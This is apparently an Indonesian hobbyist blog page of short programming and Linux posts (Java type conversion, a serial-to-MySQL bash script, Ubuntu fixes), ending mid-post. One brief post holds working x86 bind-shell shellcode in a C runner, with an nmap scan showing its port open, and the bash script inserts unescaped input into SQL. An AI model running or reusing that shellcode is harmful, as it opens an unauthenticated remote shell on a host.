fungsi auto increament dengan java

bumi gonjang ganjing langit kelap kelap katooooonnnnn!!!
ini ceritanya pas lagi iseng iseng dikerjain software Java dengan database postgresql, dimana di postgresql ini kok ya autoincreament gada kaya di mysql tho.. jadi pusing aku coba.. akhirnya nemu wangsit buat bikin dewe auto increamentnya huihuihuihui… 🙂
oke singkat cerita ada database dengan tabel soal_ekskul, ada kolom namanya “id” <– untuk cek, kasi aja type data integer, sambil nggabungin fungsi String to integer dan integer to String pada posting sebelumnya.. huihuihuihui
ini routinnya:

int m = 0;
            stmt = c.createStatement();
            String gedhang = "select * from soal_ekskul order by id desc limit 1";
            ResultSet rsa = stmt.executeQuery(gedhang);
            while(rsa.next()){
            String tape = rsa.getString("id");
               
            int ketan = Integer.parseInt(tape);
            int klepon = ketan+1;
            String dangglem = Integer.toString(klepon);
            m = m+1;

tu dah… buat ngecek kasih aja System.out.println(dangglem) ato apalah… silahkan dimodif..
eh.. yang punya kopi sama rokok dong…

konversi integer ke string di java

heuuuhhh…. kalo kemaren post tentang konversi type data string ke integer, sekarang di balik dari integer ke string… huihuihuihuihui…
sama kayak posting sebelumnya..

public class inttostring {

	public static void main (String args[]) {
		int dua = 2;
		String duwe = Integer.toString(dua);
		System.out.println("angka " + duwe + " dalam bahasa Madura adalah duwe");	

	}
}

test it.. 🙂

konversi string ke integer di Java

senja… selalu menghadirkan asa..
begitulah sedikit kepercayaanku ketika senja.. posting ini sebenernya inspirasinya ketika cangkrukan di Kantin dan minum kopi plus menghisap rokok bersama sobat – sobatku, kebetulan ada sedikit slenthingan sama temenku Heru W. a.k.a DOP tentang konversi string ke integer pada pemrograman Java. yang walhasil, berhasil deh.. ini ada sedikit contohnya, langsung saja:
berikutlah sedikit kodenya:

public class stringtoint {

	public static void main (String args[]) {	
		int dua = 2;
		String satu = "1";
		int setunggal = Integer.parseInt(satu);
		System.out.println(dua + setunggal);	
		
	}
}

oke penjelasannya adalah, bahwa variable satu bertipe data String, dan variable setunggal adalah hasil konversi variable “satu” menjadi integer, kemudian ditambahkan dengan varible “dua” yang bertipe data integer menghasilkan angka “3”, oke sekian dulu. saya menikmati senja lagi..

membaca serial2usb dan menginputkan data ke mysql via shellscriptting linux

hooo… lama juga gak update blog yak.. oke deh sedikit sharing aja, ini ceritanya adalah nemuin arsip lama, yaitu program kecil buat baca data sensor dan memasukkan data ke Database mysql, dengan susunan peralatan sbb:

sensor -> mikrokontroler -> serial2usb converter -> komputer include server mysql

oke lanjut bos, untuk mengetahui serial2usb konverternya kebaca apa tuh anak di linux, pake perintah ini

dmesg | grep tty

ntar ketahuan misal /dev/ttyACM0
dan misal di mysql ada database dengan nama “Fisika” dengan table “data” dan columns “id, suhu, waktu”, dan kita pengin masukkin data ke situ, jadi gak usa lama lama ya pegel ini..

oke berikut source program buat baca

#!/bin/bash
# inisialisasi untuk server, user dan pwd mysql
HOST="localhost";
USER="user_disini";
PWD="password_terserah_cuk";
#mulai
#disini usbtoserial kebaca ACM0
#READ=`cat /dev/ttyACM0`
while true
do
#time=`date +%a-%b-%Y:%T`
time=`date +%a-%b-%Y:%T`
sleep 1
clear
read READ < /dev/ttyACM0
# proses baca dari serial2usb
echo $READ
sleep 1
#bagian untuk memasukkan data ke mysql
#database:FISIKA tabel:data kolom:(id,suhu,waktu)
echo "USE fisika; INSERT INTO data (id,suhu,waktu) VALUES ('','$READ','$time');" > /tmp/query.sql;
 
# eksekusi queery
results=`mysql -h $HOST -u $USER -p$PWD < /tmp/query.sql`;

done

oke friend, test it. 🙂

iseng nyoba

#include <stdio.h>
char shell[] = "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80"
"\x96\x43\x52\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x66\x58\x50"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56"
"\x43\x89\xe1\xb0\x66\xcd\x80\x93\xb6\x0c\xb0\x03\xcd\x80\x89"
"\xdf\xff\xe1";
int main(void) {
       ((void (*)(void))shell)(); // str()
        return 0;
}

scan:

root@deepmind:~# nmap localhost

Starting Nmap 5.00 ( http://nmap.org ) at 2010-10-15 08:51 WIT
Interesting ports on localhost (127.0.0.1):
Not shown: 999 closed ports
PORT      STATE SERVICE
12345/tcp open  netbus

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

memunculkan icon Network Manager di ubuntu 10.04

sedikit catatan:fuuuuuuuuuhhhh.. tulisan ini ditulis 3 hari menjelang releasenya ubuntu 10.10, dan saya tidak berencana me-clean install ubuntu 10.04 saya dengan 10.10, karena capek, mending dist-upgrade aja ntar.

oke ceritanya saya sering menemukan kejadian bahwa icon Network Manager di bagian kanan atas sering menghilang setelah booting, dan ternyata kayaknya kok banyak yang dapatin seperti ini, nah ini solusinya tanpa reboot, biar gak ribet

edit file /etc/NetworkManager/nm-system-settings.conf
seperti ini

[main]
plugins=ifupdown,keyfile

[ifupdown]
managed=true

lalu dari terminal ketikkan:

killall gnome-panel

dan taraaaaaa muncul lagi tuh anak 🙂

fixing error “Dynamic MMap ran out of room” di debian

huuuuuuffffff (ekspresi lebay) mendapat sedikit masalah ketika melakukan update di ubuntu saya 😦
let’s the words show:

1.duduk permasalahan:

shadow@puppet:~$ sudo apt-get upgrade
Reading package lists... Error!
E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)
E: Error occurred while processing libgtksourceview2.0-0 (NewFileVer1)
E: Problem with MergeList /var/lib/dpkg/status
W: Unable to munmap
E: The package lists or status file could not be parsed or opened.

2. lalu mencoba:

shadow@puppet:~$ sudo apt-get autoclean
Reading package lists... Error!
E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)
E: Error occurred while processing libgtksourceview2.0-0 (NewFileVer1)
E: Problem with MergeList /var/lib/dpkg/status
W: Unable to munmap
E: The package lists or status file could not be parsed or opened.

hmmmmmm 😦 masalah ada di bagian
Read more of this post